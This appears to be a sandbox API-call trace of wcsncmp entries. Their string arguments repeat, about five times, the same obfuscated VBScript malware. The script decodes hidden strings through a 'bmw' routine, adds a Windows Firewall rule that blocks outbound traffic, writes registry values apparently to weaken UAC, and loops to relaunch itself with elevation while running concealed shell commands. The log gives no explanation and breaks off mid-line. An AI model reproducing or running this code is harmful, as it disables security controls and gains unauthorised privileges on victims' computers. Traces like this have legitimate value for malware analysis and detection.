bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0223.015] wcsncmp (_String1="mw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0223.015] wcsncmp (_String1="w(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0223.015] wcsncmp (_String1="(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0223.015] wcsncmp (_String1="\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0223.015] wcsncmp (_String1="CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, 